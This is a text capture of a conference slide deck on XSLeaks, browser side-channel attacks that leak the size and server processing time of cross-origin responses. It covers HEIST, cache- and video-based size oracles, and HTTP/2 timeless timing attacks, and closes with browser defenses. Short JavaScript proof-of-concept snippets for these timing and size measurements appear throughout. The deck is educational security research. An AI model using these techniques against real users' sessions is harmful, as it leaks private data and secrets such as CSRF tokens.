SlideShare uma empresa Scribd logo
1 de 72
Baixar para ler offline
HELP!
my browser
is
leaking
byTomVan Goethem
The modern-day browser
Processing and
rendering resources
HTTP/2 or HTTP/1.1
over TLS over TCP
Cache and
local storage
Many, many, many features
https://secure-bank.com
https://secure-bank.com https://cute-kittens.com
https://secure-bank.com https://cute-kittens.com
https://secure-bank.com https://cute-kittens.com
• Leak security information
• CSRF token (may lead to full account compromise)
• Determine the user’s identity
• Spear phishing
• User profiling
• Perform search queries under the victim’s credentials
• Leak secrets that only the victim has access to
• Extract privacy-sensitive content
• Which websites is the user logged in to?
An attacker may try to…
5
• Same-origin policy prevents site-A from accessing contents of site-B
• XSLeaks abuse side-channel information to leak metadata information
• Response timing
• Firing of events (order & time)
• Size of response
• …
• Metadata is dependent on the state of the user
• Search query has results → large response
• No results → small response
XSLeaks
6
• Response status
• Redirect (30x), 404, …
• Cache status
• Cached resources load much faster
• Rendered content & operations
• frames.length
• postMessage()
• …
7
Categories of XSLeaks
• Browser-based timing side-channels
• HEIST
Response size Server processing time
• Timeless timing attacks
In this presentation…
GET /transactions?to=tomvg
<h1>no results</h1>
<h1>no results</h1>
<h1>no results</h1>
GET /transactions?to=h4x0r
<h1>17 transactions</h1>
<ul>
<li>2017-06-19 $1,337,000 NSA hack</li>
<li>2020-09-04 $31,337 NNC hack</li>
...
<h1>17 transactions</h1>
<ul>
<li>2017-06-19 $1,337,000 NSA hack</li>
<li>2020-09-04 $31,337 NNC hack</li>
...
<h1>17 transactions</h1>
<ul>
<li>2017-06-19 $1,337,000 NSA hack</li>
<li>2020-09-04 $31,337 NNC hack</li>
...
• Measures time download resource
• Accuracy depends on Internet connection of the victim
• Not under control of the attacker
• Jitter may render attack ineffective
• Need attack that is not affected by network conditions…
11
const start = performance.now();
fetch('https://example.com/url').then((response) => {
const end = performance.now();
analyze(end - start);
});
• Timing starts after resource has been downloaded
• Not affected by network condition
• Time to parse resource as video depends on its size
• Has been mitigated
• Error is thrown before response is parsed
• Chrome: CORB - Firefox: MIME-type checking
12
const video = document.createElement('video');
let start;
video.addEventListener('suspend', () => {
start = performance.now();
});
video.addEventListener('error', () => {
const end = performance.now();
analyze(end - start);
});
video.src = 'https://example.com/url';
• Timing starts after resource has been downloaded
• Not affected by network condition
• Time to add/remove resource from cache is related to size
• Mitigated in Chrome: CORB
• Still possible to abuse in Firefox
13
const cache = await caches.open('nnc');
const url = 'https://example.com/url';
const opts = {"credentials": "include", "mode": "no-cors"};
const resp = await fetch(url, opts);
const bogusReq = '/foo' + Math.random();
const start = performance.now();
await cache.put(bogusReq, resp.clone());
await cache.delete(bogusReq);
const end = performance.now();
analyze(end - start);
• Operations performed on resources after they have been
downloaded
• Not affected by network conditions of victim
• Examples:
• Parsing resource in a specific format
• Persisting resource to disk
• Effective countermeasures: discard operations on cross-origin
resources before any operations
Browser-basedTiming Attacks
14
HEIST
fetch('https://example.com/url');
example.com
example.com
GET /url HTTP/1.1
Origin: example.com
Accept: text/html
example.com
GET /url HTTP/1.1
Origin: example.com
Accept: text/html
TLS
example.com
GET /url HTTP/1.1
Origin: example.com
Accept: text/html
TLS
TCP
example.com
GET /url HTTP/1.1
Origin: example.com
Accept: text/html
TLS
TCP
481 bytes
example.com
GET /url HTTP/1.1
Origin: example.com
Accept: text/html
TLS
TCP
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 9840
<!DOCTYPE html><html>...
481 bytes
example.com
GET /url HTTP/1.1
Origin: example.com
Accept: text/html
TLS
TCP
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 9840
<!DOCTYPE html><html>...
481 bytes
1448 bytes
example.com
GET /url HTTP/1.1
Origin: example.com
Accept: text/html
TLS
TCP
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 9840
<!DOCTYPE html><html>...
481 bytes
1448 bytes 1448 bytes
example.com
GET /url HTTP/1.1
Origin: example.com
Accept: text/html
TLS
TCP
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 9840
<!DOCTYPE html><html>...
481 bytes
1448 bytes 1448 bytes 1448 bytes
example.com
GET /url HTTP/1.1
Origin: example.com
Accept: text/html
TLS
TCP
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 9840
<!DOCTYPE html><html>...
481 bytes
1448 bytes 1448 bytes 1448 bytes
...
example.com
example.com
example.com
example.com
example.com
10 TCP packets
(= 1 TCP window)
example.com
10 TCP packets
(= 1 TCP window)
ACK
example.com
10 TCP packets
(= 1 TCP window)
...
ACK
rest of response
• Response is <= 14480 bytes: everything fits in single TCP window
• Response is > 14480 bytes: multiple TCP windows required
• Server needs to wait for ACK from client
• Additional round-trip
• Detect one or multiple round-trips? => leak information about size
TCP windows
19
const url = 'https://example.com/url';
fetch(url).then((response) => {
// first byte of response received
const firstByte = performance.now();
});
const entry = performance.getEntriesByName(url)[0];
// last byte of response received
const lastByte = entry.responseEnd;
if (lastByte - firstByte < 5) {
// 1 TCP window
} else {
// multiple TCP windows
}
• GZIP uses backreferences to compress content
GZIP compression
21
<html>
<h1>Welcome {{username}}</h1>
...
secret=NoNameCon
...
<html>
<h1>Welcome Tom</h1>
...
secret=NoNameCon
...
<html>
<h1>Welcome secret=</h1>
...
@-17,7NoNameCon
...
<html>
<h1>Welcome {{username}}</h1>
...
secret=NoNameCon
...
<html>
<h1>Welcome secret=a</h1>
...
@-17,7NoNameCon
...
<html>
<h1>Welcome secret=N</h1>
...
@-17,8oNameCon
...
8900 bytes 8899 bytes
• Correct character guess: 1 byte less
• Pad resource to one TCP window
• Reflecting URL parameters
• HTTP/2: using other resources
• Correct guess: one TCP window = one RTT
• vs. Incorrect guess: two TCP windows = multiple RTT
• Leak secrets byte by byte
HEIST
23
• Browser-based timing side-channel
• Estimate of size
• HEIST
• Exact size (after padding)
• After compression (=> leak secrets)
24
Response size Server processing time
• Timeless timing attacks
• HTTP/2
• Concurrency
Timeless
Timing
Attacks
• Typical timing attack
• Heavily affected by network jitter
• Can we do better?
26
const start = performance.now();
fetch('https://example.com/url').then((response) => {
const end = performance.now();
analyze(end - start);
});
fetch('https://example.com/url1');
fetch('https://example.com/url2');
• IF two requests arrive at the same time
• And are processed in parallel
• We know which one took longer to process
• By simply looking at the response order
TimelessTiming Attacks
28
• Major improvement in HTTP/2: concurrency
• We can execute multiple requests in parallel over a single connection
• TCP congestion windows also apply to the client
• Sending large request (or multiple): need to wait for ACK from server before
sending more than one TCP window
• While waiting for ACK, following requests are added to same TCP
packet
HTTP/2
29
example.com
example.com
POST /large
example.com
POST /large
example.com
POST /large
example.com
POST /large
example.com
POST /large
example.com
10 TCP packets
(= 1 TCP window)
POST /large
example.com
10 TCP packets
(= 1 TCP window)
POST /largeGET /url1
example.com
10 TCP packets
(= 1 TCP window)
POST /largeGET /url1
example.com
10 TCP packets
(= 1 TCP window)
POST /largeGET /url1
GET /url2
example.com
10 TCP packets
(= 1 TCP window)
POST /largeGET /url1
GET /url2
example.com
10 TCP packets
(= 1 TCP window)
ACK
POST /largeGET /url1
GET /url2
fetch('https://example.com/large', {
"method": "POST",
"body": largeString
});
let first;
fetch('https://example.com/url1').then(() => {
first = first || 'url1';
});
fetch('https://example.com/url2').then(() => {
first = first || 'url2';
});
• Can distinguish timing differences up to 100 times smaller
• In certain cases as small as 150ns
• Possible to exploit timing attacks that were previously not possible
to exploit
• Generic technique, CDNs can pose some limitations
TimelessTiming Attacks
32
• Many relatively new security features that aim to “fix” the Web
• CORB, CORP, COEP, COOP, SameSite cookies, SecFetch-*
• Aim to limit “bad” functionality that has been pestering the Web
• Cookies should not be included in cross-site requests
• It should not be possible to “play with” cross-site responses
• Attacker shouldn’t be able to endlessly interfere with cross-origin windows
• …
• Most effective when enabled by default
• Finding balance between breaking functionality and guaranteeing security
Defenses
33
• Browsers leak metadata about cross-origin resources
• Can be used to extract sensitive content from users
• In this presentation:
• Leaking the size: estimate/exact
• Leaking server processing time: 100x more accurate
• Independent of network conditions
• Defenses aim to remove the bad legacy features from the Web
• Intervention from websites still required
Conclusion
34
Questions?
@tomvangoethem
tom.vangoethem@cs.kuleuven.be

Mais conteĂşdo relacionado

Mais procurados

Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1
PacSecJP
 
Attacking http2 implementations (1)
Attacking http2 implementations (1)Attacking http2 implementations (1)
Attacking http2 implementations (1)
John Villamil
 
Web tech 101
Web tech 101Web tech 101
Web tech 101
Dan Phiffer
 

Mais procurados (20)

HAProxy
HAProxy HAProxy
HAProxy
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache Headers
 
HAProxy 1.9
HAProxy 1.9HAProxy 1.9
HAProxy 1.9
 
Altitude San Francisco 2018: Programming the Edge
Altitude San Francisco 2018: Programming the EdgeAltitude San Francisco 2018: Programming the Edge
Altitude San Francisco 2018: Programming the Edge
 
Ethernet Shield
Ethernet ShieldEthernet Shield
Ethernet Shield
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache Headers
 
Using Communication and Messaging API in the HTML5 World
Using Communication and Messaging API in the HTML5 WorldUsing Communication and Messaging API in the HTML5 World
Using Communication and Messaging API in the HTML5 World
 
TLS - 2016 Velocity Training
TLS - 2016 Velocity TrainingTLS - 2016 Velocity Training
TLS - 2016 Velocity Training
 
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018
 
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018
 
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for DummiesBartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
 
Devoxx Maroc 2015 HTTP 1, HTTP 2 and folks
Devoxx Maroc  2015 HTTP 1, HTTP 2 and folksDevoxx Maroc  2015 HTTP 1, HTTP 2 and folks
Devoxx Maroc 2015 HTTP 1, HTTP 2 and folks
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
 
HTTP Caching in Web Application
HTTP Caching in Web ApplicationHTTP Caching in Web Application
HTTP Caching in Web Application
 
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
 
Observability tips for HAProxy
Observability tips for HAProxyObservability tips for HAProxy
Observability tips for HAProxy
 
Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1
 
Attacking http2 implementations (1)
Attacking http2 implementations (1)Attacking http2 implementations (1)
Attacking http2 implementations (1)
 
Web tech 101
Web tech 101Web tech 101
Web tech 101
 
Apache Httpd and TLS certificates validations
Apache Httpd and TLS certificates validationsApache Httpd and TLS certificates validations
Apache Httpd and TLS certificates validations
 

Semelhante a Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van Goethem

[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
[OPD 2019] Side-Channels on the Web:
Attacks and Defenses[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
OWASP
 
Websockets at tossug
Websockets at tossugWebsockets at tossug
Websockets at tossug
clkao
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?
timbc
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
Krzysztof Kotowicz
 

Semelhante a Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van Goethem (20)

Http2 in practice
Http2 in practiceHttp2 in practice
Http2 in practice
 
Side-Channels on the Web: Attacks and Defenses
Side-Channels on the Web: Attacks and DefensesSide-Channels on the Web: Attacks and Defenses
Side-Channels on the Web: Attacks and Defenses
 
6 app-tcp
6 app-tcp6 app-tcp
6 app-tcp
 
[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
[OPD 2019] Side-Channels on the Web:
Attacks and Defenses[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
 
Primer to Browser Netwroking
Primer to Browser NetwrokingPrimer to Browser Netwroking
Primer to Browser Netwroking
 
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
 
Http2 kotlin
Http2   kotlinHttp2   kotlin
Http2 kotlin
 
Go 1.8 'new' networking features
Go 1.8 'new' networking featuresGo 1.8 'new' networking features
Go 1.8 'new' networking features
 
Http request&response
Http request&responseHttp request&response
Http request&response
 
Websockets at tossug
Websockets at tossugWebsockets at tossug
Websockets at tossug
 
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?
 
PPT
PPTPPT
PPT
 
HTTP/2 What's inside and Why
HTTP/2 What's inside and WhyHTTP/2 What's inside and Why
HTTP/2 What's inside and Why
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
Doing QoS Before Ceph Cluster QoS is available - David Byte, Alex Lau
Doing QoS Before Ceph Cluster QoS is available - David Byte, Alex LauDoing QoS Before Ceph Cluster QoS is available - David Byte, Alex Lau
Doing QoS Before Ceph Cluster QoS is available - David Byte, Alex Lau
 
Linux HTTPS/TCP/IP Stack for the Fast and Secure Web
Linux HTTPS/TCP/IP Stack for the Fast and Secure WebLinux HTTPS/TCP/IP Stack for the Fast and Secure Web
Linux HTTPS/TCP/IP Stack for the Fast and Secure Web
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2
 
SPDY & HTTP2.0 & QUIC - #bpstudy 2013-08-28
SPDY & HTTP2.0 & QUIC - #bpstudy 2013-08-28SPDY & HTTP2.0 & QUIC - #bpstudy 2013-08-28
SPDY & HTTP2.0 & QUIC - #bpstudy 2013-08-28
 
The SPDY Protocol
The SPDY ProtocolThe SPDY Protocol
The SPDY Protocol
 

Mais de NoNameCon

Ruslan Kiyanchuk - Калина, Купина, та інша флора вітчизняної криптографії
Ruslan Kiyanchuk - Калина, Купина, та інша флора вітчизняної криптографіїRuslan Kiyanchuk - Калина, Купина, та інша флора вітчизняної криптографії
Ruslan Kiyanchuk - Калина, Купина, та інша флора вітчизняної криптографії
NoNameCon
 
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
NoNameCon
 
Ievgen Kulyk - Advanced reverse engineering techniques in unpacking
Ievgen Kulyk - Advanced reverse engineering techniques in unpackingIevgen Kulyk - Advanced reverse engineering techniques in unpacking
Ievgen Kulyk - Advanced reverse engineering techniques in unpacking
NoNameCon
 
Kostiantyn Korsun - State Cybersecurity vs. Cybersecurity of the State. #FRD ...
Kostiantyn Korsun - State Cybersecurity vs. Cybersecurity of the State. #FRD ...Kostiantyn Korsun - State Cybersecurity vs. Cybersecurity of the State. #FRD ...
Kostiantyn Korsun - State Cybersecurity vs. Cybersecurity of the State. #FRD ...
NoNameCon
 
Alexander Olenyev & Andrey Voloshin - Car Hacking 101 by NoNameCon
Alexander Olenyev & Andrey Voloshin - Car Hacking 101 by NoNameConAlexander Olenyev & Andrey Voloshin - Car Hacking 101 by NoNameCon
Alexander Olenyev & Andrey Voloshin - Car Hacking 101 by NoNameCon
NoNameCon
 
Stas Kolenkin & Taras Bobalo - CloudFlare Recon Workshop
Stas Kolenkin & Taras Bobalo - CloudFlare Recon WorkshopStas Kolenkin & Taras Bobalo - CloudFlare Recon Workshop
Stas Kolenkin & Taras Bobalo - CloudFlare Recon Workshop
NoNameCon
 
Serhii Aleynikov - Remote Forensics of a Linux Server Without Physical Access
Serhii Aleynikov - Remote Forensics of a Linux Server Without Physical AccessSerhii Aleynikov - Remote Forensics of a Linux Server Without Physical Access
Serhii Aleynikov - Remote Forensics of a Linux Server Without Physical Access
NoNameCon
 
Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life u...
Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life u...Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life u...
Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life u...
NoNameCon
 

Mais de NoNameCon (20)

Anastasiia Vixentael – Encryption basics [NoName CyberKids]
Anastasiia Vixentael – Encryption basics [NoName CyberKids]Anastasiia Vixentael – Encryption basics [NoName CyberKids]
Anastasiia Vixentael – Encryption basics [NoName CyberKids]
 
Ihor Malchenyuk – What is privacy and how to protect it [NoName CyberKids]
Ihor Malchenyuk – What is privacy and how to protect it [NoName CyberKids]Ihor Malchenyuk – What is privacy and how to protect it [NoName CyberKids]
Ihor Malchenyuk – What is privacy and how to protect it [NoName CyberKids]
 
Olha Pasko - Hunting fileless malware [workshop]
Olha Pasko - Hunting fileless malware [workshop] Olha Pasko - Hunting fileless malware [workshop]
Olha Pasko - Hunting fileless malware [workshop]
 
Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...
Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...
Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...
 
Ruslan Kiyanchuk - Калина, Купина, та інша флора вітчизняної криптографії
Ruslan Kiyanchuk - Калина, Купина, та інша флора вітчизняної криптографіїRuslan Kiyanchuk - Калина, Купина, та інша флора вітчизняної криптографії
Ruslan Kiyanchuk - Калина, Купина, та інша флора вітчизняної криптографії
 
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
 
Stephanie Vanroelen - Mobile Anti-Virus apps exposed
Stephanie Vanroelen - Mobile Anti-Virus apps exposedStephanie Vanroelen - Mobile Anti-Virus apps exposed
Stephanie Vanroelen - Mobile Anti-Virus apps exposed
 
Oksana Safronova - Will you detect it or not? How to check if security team i...
Oksana Safronova - Will you detect it or not? How to check if security team i...Oksana Safronova - Will you detect it or not? How to check if security team i...
Oksana Safronova - Will you detect it or not? How to check if security team i...
 
Bert Heitink - 10 major steps for Cybersecurity
Bert Heitink - 10 major steps for CybersecurityBert Heitink - 10 major steps for Cybersecurity
Bert Heitink - 10 major steps for Cybersecurity
 
Ievgen Kulyk - Advanced reverse engineering techniques in unpacking
Ievgen Kulyk - Advanced reverse engineering techniques in unpackingIevgen Kulyk - Advanced reverse engineering techniques in unpacking
Ievgen Kulyk - Advanced reverse engineering techniques in unpacking
 
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
 
Pavlo Zhavoronkov - What is autumn like in prison camps?
Pavlo Zhavoronkov - What is autumn like in prison camps?Pavlo Zhavoronkov - What is autumn like in prison camps?
Pavlo Zhavoronkov - What is autumn like in prison camps?
 
Alexander Olenyev & Andrey Voloshin - Car Hacking: Yes, You can do that!
Alexander Olenyev & Andrey Voloshin - Car Hacking: Yes, You can do that!Alexander Olenyev & Andrey Voloshin - Car Hacking: Yes, You can do that!
Alexander Olenyev & Andrey Voloshin - Car Hacking: Yes, You can do that!
 
Kostiantyn Korsun - State Cybersecurity vs. Cybersecurity of the State. #FRD ...
Kostiantyn Korsun - State Cybersecurity vs. Cybersecurity of the State. #FRD ...Kostiantyn Korsun - State Cybersecurity vs. Cybersecurity of the State. #FRD ...
Kostiantyn Korsun - State Cybersecurity vs. Cybersecurity of the State. #FRD ...
 
Eugene Pilyankevich - Getting Secure Against Challenges Or Getting Security C...
Eugene Pilyankevich - Getting Secure Against Challenges Or Getting Security C...Eugene Pilyankevich - Getting Secure Against Challenges Or Getting Security C...
Eugene Pilyankevich - Getting Secure Against Challenges Or Getting Security C...
 
Alexander Olenyev & Andrey Voloshin - Car Hacking 101 by NoNameCon
Alexander Olenyev & Andrey Voloshin - Car Hacking 101 by NoNameConAlexander Olenyev & Andrey Voloshin - Car Hacking 101 by NoNameCon
Alexander Olenyev & Andrey Voloshin - Car Hacking 101 by NoNameCon
 
Stas Kolenkin & Taras Bobalo - CloudFlare Recon Workshop
Stas Kolenkin & Taras Bobalo - CloudFlare Recon WorkshopStas Kolenkin & Taras Bobalo - CloudFlare Recon Workshop
Stas Kolenkin & Taras Bobalo - CloudFlare Recon Workshop
 
Serhii Korolenko - Passing Security By
Serhii Korolenko - Passing Security BySerhii Korolenko - Passing Security By
Serhii Korolenko - Passing Security By
 
Serhii Aleynikov - Remote Forensics of a Linux Server Without Physical Access
Serhii Aleynikov - Remote Forensics of a Linux Server Without Physical AccessSerhii Aleynikov - Remote Forensics of a Linux Server Without Physical Access
Serhii Aleynikov - Remote Forensics of a Linux Server Without Physical Access
 
Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life u...
Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life u...Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life u...
Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life u...
 

Último

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 

Último (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 

Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van Goethem